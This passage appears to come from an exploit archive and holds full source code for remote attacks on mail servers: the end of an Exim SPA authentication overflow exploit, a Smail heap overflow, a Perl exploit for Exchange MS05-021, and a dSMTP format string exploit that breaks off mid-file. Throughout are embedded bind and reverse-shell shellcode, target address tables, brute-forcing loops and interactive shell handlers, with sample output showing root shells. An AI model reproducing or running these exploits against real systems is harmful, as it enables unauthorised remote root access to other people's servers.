printf(" Connecting to %s:%d... ",
inet_ntoa(options.host.sin_addr), ntohs(options.host.sin_port));
fflush(stdout);
}
sock_smtp = connect_port(ntohs(options.host.sin_port));
if (!brutemode)
{
if (!sock_smtp)
{
printf("failed.\n\n");
exit(-1);
}
printf("success.\n");
}
init_SPA(sock_smtp);
exploit(sock_smtp, address);
close(sock_smtp);
printf(" Target: %s - 0x%.8x\n", targets[options.target].name, address);
printf(" Exploit sent, spawning a shell... ");
fflush(stdout);
sleep(1); // patience grasshopper
sock_shell = connect_port(SC_PORT);
if (!sock_shell && options.target)
{
printf("failed.\n\n");
exit(-1);
}
if (!sock_shell)
{
printf("failed.\n\n");
address -= 1000 - strlen(sc);
brutemode = 1;
if (options.wait) sleep(options.wait);
goto bruteforce;
}
printf("success!\n\nEnjoy your shell :)\n\n");
shell(sock_shell);
return 0;
}
int connect_port(u_short port)
{
int sock;
struct sockaddr_in host;
memcpy(&host, &options.host, sizeof(options.host));
host.sin_port = ntohs(port);
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
return 0;
if(connect(sock, (struct sockaddr *)&host, sizeof(host)) < 0)
{
close(sock);
return 0;
}
return sock;
}
void init_SPA(int sock)
{
char buffer[1024];
memset(buffer, 0, sizeof(buffer));
if (!read(sock, buffer, sizeof(buffer)))
err(-1, "read");
buffer[255] = '\0';
if (!brutemode)
printf(" Server banner: %s", buffer);
write(sock, "EHLO ECL.PWNZ.J00\n", 18);
memset(buffer, 0, sizeof(buffer));
if (!read(sock, buffer, sizeof(buffer)))
err(-1, "read");
else
if (!brutemode && (!strstr(buffer, "NTLM")))
printf("[?] Server doesn't seem to support SPA, trying anyway\n");
write(sock, "AUTH NTLM\n", 10);
memset(buffer, 0, sizeof(buffer));
if (!read(sock, buffer, sizeof(buffer)))
err(-1, "read");
else
if (!brutemode && (!strstr(buffer, "334")))
{
printf("[!] SPA unsupported! Server responds: %s\n\n", buffer);
exit(1);
}
if (!brutemode) printf(" SPA (NTLM) supported\n");
}
void exploit(int sock, int address)
{
char exp[2000], exp_base64[2668];
int *address_p;
int i;
memset(exp, NOP, 1000);
memcpy(&exp[1000]-strlen(sc), sc, strlen(sc));
address_p = (int *)&exp[1000];
for (i=0; i<1000; i+=4)
*(address_p++) = address;
spa_bits_to_base64(exp_base64, exp, sizeof(exp));
write(sock, exp_base64, sizeof(exp_base64));
write(sock, "\n", 1);
}
void shell(int sock)
{
int n;
fd_set fd;
char buff[1024];
write(sock,"uname -a;id\n",12);
while(1)
{
FD_SET(sock, &fd);
FD_SET(0, &fd);
select(sock+1, &fd, NULL, NULL, NULL);
if( FD_ISSET(sock, &fd) )
{
n = read(sock, buff, sizeof(buff));
if (n < 0) err(1, "remote read");
write(1, buff, n);
}
if ( FD_ISSET(0, &fd) )
{
n = read(0, buff, sizeof(buff));
if (n < 0) err(1, "local read");
write(sock, buff, n);
}
}
}
char base64digits[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";
void spa_bits_to_base64 (unsigned char *out, const unsigned char *in, int inlen)
{
for (; inlen >= 3; inlen -= 3)
{
*out++ = base64digits[in[0] >> 2];
*out++ = base64digits[((in[0] << 4) & 0x30) | (in[1] >> 4)];
*out++ = base64digits[((in[1] << 2) & 0x3c) | (in[2] >> 6)];
*out++ = base64digits[in[2] & 0x3f];
in += 3;
}
if (inlen > 0)
{
unsigned char fragment;
*out++ = base64digits[in[0] >> 2];
fragment = (in[0] << 4) & 0x30;
if (inlen > 1)
fragment |= in[1] >> 4;
*out++ = base64digits[fragment];
*out++ = (inlen < 2) ? '=' : base64digits[(in[1] << 2) & 0x3c];
*out++ = '=';
}
*out = '\0';
}
void parse_options(int argc, char **argv)
{
int ch;
struct hostent *hn;
memset(&options, 0, sizeof(options));
options.host.sin_family = AF_INET;
options.host.sin_port = htons(25);
options.target = -1;
options.wait = 1;
while (( ch = getopt(argc, argv, "h:p:t:o:w:")) != -1)
switch(ch)
{
case 'h':
if ( (hn = gethostbyname(optarg)) == NULL)
errx(-1, "Unresolvable address\n");
memcpy(&options.host.sin_addr, hn->h_addr, hn->h_length);
break;
case 'p':
options.host.sin_port = htons((u_short)atoi(optarg));
break;
case 't':
if ((atoi(optarg) > (sizeof(targets)/8-1) || (atoi(optarg) < 0)))
errx(-1, "Bad target\n");
options.target = atoi(optarg);
break;
case 'o':
options.offset = atoi(optarg);
break;
case 'w':
options.wait = (u_short)atoi(optarg);
break;
case '?':
exit(1);
default:
usage(argv[0]);
}
if (!options.host.sin_addr.s_addr || (options.target == -1) )
usage(argv[0]);
}
void usage(char *cmd)
{
int i;
printf("Usage: %s [ -h host ] [ -p port ] [ -t target ] [ -o offset ] [ -w wait ]\n\n"
"\t-h: remote host\n"
"\t-p: remote port\n"
"\t-t: target return address (see below)\n"
"\t-o: return address offset\n"
"\t-w: seconds to wait before bruteforce reconnecting\n\n",
cmd);
printf("Targets:\n");
for (i=0; i<(sizeof(targets)/8); i++)
printf("%d - %s (0x%.8x)\n", i, targets[i].name, targets[i].retaddr);
printf("\n");
exit(1);
}
void banner(void)
{
printf("\t\tExim <= 4.43 SPA authentication exploit\n"
"\t\t Yuri Gushin <[email protected]>\n"
"\t\t\t ECL Team\n\n\n");
}
// [2005-02-12]
25 Smail 3.2.0.120 Remote Root Heap Overflow Exploit
/*
*
* 0
*
* smail preparse_address_1() heap bof remote root exploit
*
* infamous42md AT hotpop DOT com
*
* Shouts:
*
* BMF, wipe with the left, eat with the right
*
* Notes:
*
* You can't have any characters in overflow buffer that isspace() returns true
* for. The shellcode is clear of them, but if your return address or retloc
* has one you gotta figure out another one. My slack box has that situation,
* heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I
* don't have anymore time to BS around with this and make perfect for any and
* all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
* If the heap you're targetting is the same way, then try filling it up using
* some other commands. If the GOT you're targetting is at such address than
* overwrite a return address on the stack. Surely there's a way, check out the
* source and be creative; I'm sure there are some memory leaks somewhere you
* can use to fill up heap as well.
*
* You might run into some ugliness trying to automate this for a couple
* reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks
* for this cookie before calling free(). So you're going to need that aligned
* properly unless you can cook up a way to exploit it when it bails out in
* xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
* maybe you can be clever and do something there). Furthermore I found that
* when trying to trigger this multiple times the alignment was different each
* time. There are "definitely" more reliable ways to exploit this if you take
* a deeper look into code which I don't have time to do right now. The padding
* parameter controls the alignment and the size of the chunk being allocated.
* You'll probably have to play with it. Yes that's fugly.
*
* [[email protected]] ./a.out
* Usage: ./a.out < host > < padding > < retloc > < retaddr >
*
* [[email protected]] ./a.out localhost 64 0xbffff39c 0x8111ea0
* --{ Smack 1.oohaah
*
* --{ definitely, adv.:
* --{ 1. Having distinct limits
* --{ 2. Indisputable; certain
* --{ 3. Clearly defined; explicitly precise
*
* --{ Said HELO
*
* --{ Sent MAIL FROM overflow
*
* --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
*
* --{ Attempting to redefine the meaning of 'definitely'
*
* --{ Got a shell
*
* --{ Updating Webster's
* --{ definitely, adv.:
* --{ 1. See specious
*
* --{ For the linguistically challenged...
* --{ specious, adj. :
* --{ 1. Having the ring of truth or plausibility but actually fallacious
* --{ 2. Deceptively attractive
*
* id
* uid=0(root) gid=0(root)
* echo PWNED
* PWNED
*
* - Connection closed by user
*
*/
#include <stdio.h>
#include <ctype.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/select.h>
#include <arpa/inet.h>
/* */
#define BS 0x1000
#define SMTP_PORT 25
#define Z(x, len) memset((x), 0, (len))
#define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args); exit(EXIT_FAILURE); }while(0)
/* fat bloated call them shell code */
#define SHELL_LEN (sizeof(sc)-1)
#define SHELL_PORT 6969
#define NOP 0x90
char sc[] =
"\xeb\x0e""notexploitable"
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x 04\x24\x02\x89\xe6\xb0\x02"
"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\x cd\x80\x50\x6a\x01\x6a\x02"
"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x 6a\x10\x56\x50\x89\xe1\xb0"
"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x 31\xdb\xb0\x66\xb3\x04\xcd"
"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\x cd\x80\x89\xc5\x31\xc0\x89"
"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\x f6\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\x e1\x99\xb0\x6b\x2c\x60\xcd"
"\x80";
/* a dlmalloc chunk descriptor */
#define CHUNKSZ 0xfffffff8
#define CHUNKLEN sizeof(mchunk_t)
typedef struct _mchunk {
size_t dummy;
size_t prevsz;
size_t sz;
long fd;
long bk;
} mchunk_t;
/* */
ssize_t Send(int s, const void *buf, size_t len, int flags)
{
ssize_t n;
n = send(s, buf, len, flags);
if(n < 0)
die("send");
return n;
}
/* */
ssize_t Recv(int s, void *buf, size_t len, int flags)
{
ssize_t n;
n = recv(s, buf, len, flags);
if(n < 0)
die("recv");
return n;
}
/* */
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
bye("gethostbyname failed with error %s", hstrerror(h_errno));
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
die("socket");
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");
return sock;
}
/* */
void shell(char *host, u_short port)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sock = conn(host, port);
printf("--{ Got a shell\n\n"
"--{ Updating Webster's\n"
"--{ definitely, adv.:\n"
"--{ 1. See specious\n\n"
"--{ For the linguistically challenged...\n"
"--{ specious, adj. :\n"
"--{ 1. Having the ring of truth or plausibility but "
"actually fallacious\n"
"--{ 2. Deceptively attractive\n\n"
);
FD_ZERO(&rfds);
while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if (FD_ISSET(STDIN_FILENO, &rfds)) {
l = read(0, buf, BS);
if(l < 0)
die("read");
else if(l == 0)
bye("\n - Connection closed by user\n");
if (write(sock, buf, l) < 1)
die("write");
}
if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
bye("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");
if (write(STDOUT_FILENO, buf, l) < 1)
die("write");
}
}
}
/* */
int parse_args(int argc, char **argv, char **host, int *npad,
u_int *retloc, u_int *retaddr)
{
if(argc < 5)
return 1;
*host = argv[1];
if(sscanf(argv[2], "%d", npad) != 1)
return 1;
if(sscanf(argv[3], "%x", retloc) != 1)
return 1;
if(sscanf(argv[4], "%x", retaddr) != 1)
return 1;
return 0;
}
/* */
void sploit(int sock, int npad, u_int retloc, u_int retaddr)
{
ssize_t n = 0;
u_char buf[BS], pad[BS], evil[BS];
mchunk_t chunk;
Z(buf, BS), Z(pad, BS), Z(evil, BS), Z(&chunk, CHUNKLEN);
/* read greeting */
n = Recv(sock, buf, BS, 0);
if(n == 0)
bye("Server didn't even say hi");
/* send HELO */
n = snprintf(buf, BS, "HELO localhost\r\n");
Send(sock, buf, n, 0);
Z(buf, BS);
n = Recv(sock, buf, BS, 0);
if(n == 0)
bye("Server didn't respond to HELO");
printf("--{ Said HELO\n\n");
/*
* Build evil chunk overflow. The need to align chunk exactly makes this
* not so robust. In my short testing I wasn't able to get free() called
* directly on an area of memory we control. I'm sure you can though if you
* take some time to study process heap behavior. Note though that you'll
* have to fill in the magic cookie field that xmalloc()/xfree() and some
* other functions use, so you'll still need to have it aligned properly
* which defeats the whole purpose. This exploits the free() call on the
* buffer we overflow, so you have to align the next chunk accordingly.
* Anyhow on newest glibc there is a check for negative size field on the
* chunk being freed, and program dies if it is negative (the exact
* condition is not negative, but it has that effect pretty much, but go
* look yourself ;)), So the techniques outlined by gera in phrack don't
* work (being able to point all chunks at our two evil chunks). Check out
* most recent glibc code in _int_free() if you haven't already.
*/
memset(pad, 'A', npad);
chunk.dummy = CHUNKSZ;
chunk.prevsz = CHUNKSZ;
chunk.sz = CHUNKSZ;
chunk.fd = retloc - 12;
chunk.bk = retaddr;
memcpy(evil, &chunk, CHUNKLEN);
evil[CHUNKLEN] = 0;
/* send the overflow */
n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
Send(sock, buf, n, 0);
Z(buf, BS);
printf("--{ Sent MAIL FROM overflow\n\n");
#define SLEEP_TIME 15
setbuf(stdout, NULL);
printf("--{ Going for shell in ");
for(n = 0; n < SLEEP_TIME; n++){
printf("%d ", SLEEP_TIME-n);
sleep(1);
}
puts("\n");
}
/*
*/
int main(int argc, char **argv)
{
int sock = 0, npad = 0;
u_int retloc = 0, retaddr = 0;
char *host = NULL;
if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
printf("--{ Smack 1.oohaah\n\n");
sock = conn(host, SMTP_PORT);
printf("--{ definitely, adv.:\n"
"--{ 1. Having distinct limits\n"
"--{ 2. Indisputable; certain\n"
"--{ 3. Clearly defined; explicitly precise\n\n"
);
sploit(sock, npad, retloc, retaddr);
printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
shell(host, SHELL_PORT);
return EXIT_SUCCESS;
}
// [2005-03-28]
25 MS Exchange Server Remote Code Execution Exploit (MS05-021)
#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";
my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x 51\x0a\xbb\xD5\x01" .
"\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 0b\x51\x50\xbb\x5F" .
"\x0C\x59\x7C\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 0D\x31\xd2\x52\x51" .
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\x72\x69\x59\x7C\x ff\xd0\xe8\xc4\xff" .
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x 4e\xe8\xc2\xff\xff" .
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x 4e\xe8\xc2\xff\xff" .
"\xff\x4D\x53\x30\x35\x2D\x30\x32\x31\x20\x54\x65\x 73\x74\x4e";
my $cmd="X-LINK2STATE CHUNK=";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 1st chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "\r\n";
send $socket, $request, 0;
print "[+] Sent 2nd chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
close $socket;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 3rd chunk\n";
close $socket;
# [2005-04-19]
25 dSMTP Mail Server 3.1b Linux Remote Root Format String Exploit
/*
* dSMTP - SMTP Mail Server 3.1b Linux Remote Root Format String Exploit
*
* cybertronic[at]gmx[dot]net
*
* 05/05/2005
*
* This exploits the "xtellmail" command!
*
* bindc0de breaks somehow, cb works fine!
* remote buffer space is about 256 bytes
* bad chars: 0x00, 0x20, 0x0a and prolly more
*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* NOTE: before you start, change the password in function exploit () *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*
* [ cybertronic @ dsmtp ] # ./dmail_expl -h 192.168.2.50 -p 25 -l 192.168.2.40 -t 0
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ connecting to 192.168.2.50:25...done!
*
* --[ 220 linux.local DSMTP ESMTP Mail Server
*
* --[ select shellcode
* |
* |- [0] bind
* `- [1] cb
* >> 1
* --[ using cb shellcode
* --[ GOT: 0x08116844
* --[ RET: 0xbffe51f8
* --[ sending packet [ 252 bytes ]...done!
* --[ starting reverse handler [port: 45295]...done!
* --[ incomming connection from: 192.168.2.50
* --[ b0x pwned - h4ve phun
* Linux linux 2.4.21-99-athlon #1 Wed Sep 24 13:34:32 UTC 2003 i686 athlon i386 GNU/Linux
* uid=0(root) gid=0(root) groups=0(root)
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define NOP 0x90
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long smashaddr, unsigned long writeaddr, char* cbip );
int shell ( int s, char* tip );
int usage ( char* name );
void start_reverse_handler ( unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void header ();
void wait ( int sec );
/***********************
* Linux x86 Shellcode *
***********************/
//131 bytes connect back shellcode, port: 45295
char reverseshell[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
//129 bytes bind shellcode, port 3879
char bindshell[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0"
"\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc"
"\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66"
"\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45"
"\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89"
"\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0"
"\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45"
"\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff"
"\xff\xff/bin/sh";
typedef struct _args {
char* tip;
char* lip;
int tport;
int target;
} args;
struct targets {
int num;
unsigned long smashaddr;
unsigned long writeaddr;
char name[64];
}
target[]= {
{ 0, 0x08116844, 0xbffe51f8, "SuSE Linux 9.0 (i586) - 2.4.21-99-athlon" }, //08116844 R_386_JUMP_SLOT strchr
{ 1, 0x08116844, 0xdeadc0de, "description" }
};
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
char in[1024];
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
bzero ( &in, sizeof ( in ) );
if ( read ( s, in, sizeof ( in ) ) <= 0 )
{
printf ( "read failed!\n" );
return ( 1 );
}
printf ( "\n--[ %s\n", in );
return ( s );
}
int
exploit ( int s, unsigned long smashaddr, unsigned long writeaddr, char* cbip )
{
char buffer[512];
char a, b, c, d;
unsigned int low, high, cyber, tronic;
unsigned long ulcbip;
/***** change the password! *****/
char* pass = "522295153136689045";
/********************************/
printf ( "--[ GOT: 0x%08x\n", smashaddr );
printf ( "--[ RET: 0x%08x\n", writeaddr );
a = ( smashaddr & 0xff000000 ) >> 24;
b = ( smashaddr & 0x00ff0000 ) >> 16;
c = ( smashaddr & 0x0000ff00 ) >> 8;
d = ( smashaddr & 0x000000ff );
high = ( writeaddr & 0xffff0000 ) >> 16;
low = ( writeaddr & 0x0000ffff );
bzero ( &buffer, sizeof ( buffer ) );
if ( high < low )
{
printf ( "1\n" );
sprintf ( buffer,
"xtellmail %s X"
"%c%c%c%c"
"%c%c%c%c"
"%%.%uu%%1295$hn"
"%%.%uu%%1296$hn",
pass,
d + 2, c, b, a,
d, c, b, a,
high - 40,
low - high );
}
else
{
sprintf ( buffer,
"xtellmail %s X"
"%c%c%c%c"
"%c%c%c%c"
"%%.%uu%%1296$hn"
"%%.%uu%%1295$hn",
pass,
d + 2, c, b, a,
d, c, b, a,
low - 40,
high - low );
}
memset ( buffer + strlen ( buffer ), NOP, 180 );
if ( cbip == NULL )
memcpy ( buffer + 110, bindshell, sizeof ( bindshell ) -1 );
else
{
ulcbip = inet_addr ( cbip );
memcpy ( &reverseshell[33], &ulcbip, 4 );
memcpy ( buffer + 110, reverseshell, sizeof ( reverseshell ) -1 );
}
strncat ( buffer, "\r\n", 2 );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
return ( 0 );
}
int
shell ( int s, char* tip )
{
int n;
char* cmd = "unset HISTFILE;uname -a;id;\n";
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
if ( write ( s, cmd, strlen ( cmd ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
int
usage ( char* name )
{
int i;
printf ( "\n" );
printf ( "Note: all switches have to be specified!\n" );
printf ( "You can choose between bind and cb shellcode later!\n" );
printf ( "\n" );
printf ( "Usage: %s -h <tip> -p <tport> -l <cbip> -t <target>\n", name );
printf ( "\n" );
printf ( "Targets\n\n" );
for ( i = 0; i < 2; i++ )
printf ( "\t[%d] [0x%08x] [0x%08x] [%s]\n", target[i].num, target[i].smashaddr, target[i].writeaddr, target[i].name );
printf ( "\n" );
exit ( 1 );
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ("--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip );
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "h:p:l:t:" ) ) != -1 )
{
switch ( i )
{
case 'h':
argp->tip = optarg;
break;
case 'p':
argp->tport = atoi ( optarg );
break;
case 'l':
argp->lip = optarg;
break;
case 't':
argp->target = strtoul ( optarg, NULL, 16 );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->lip == NULL || argp->target < 0 || argp->target > 1 )
usage ( argv[0] );
}
void
start_reverse_handler ( unsigned short cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
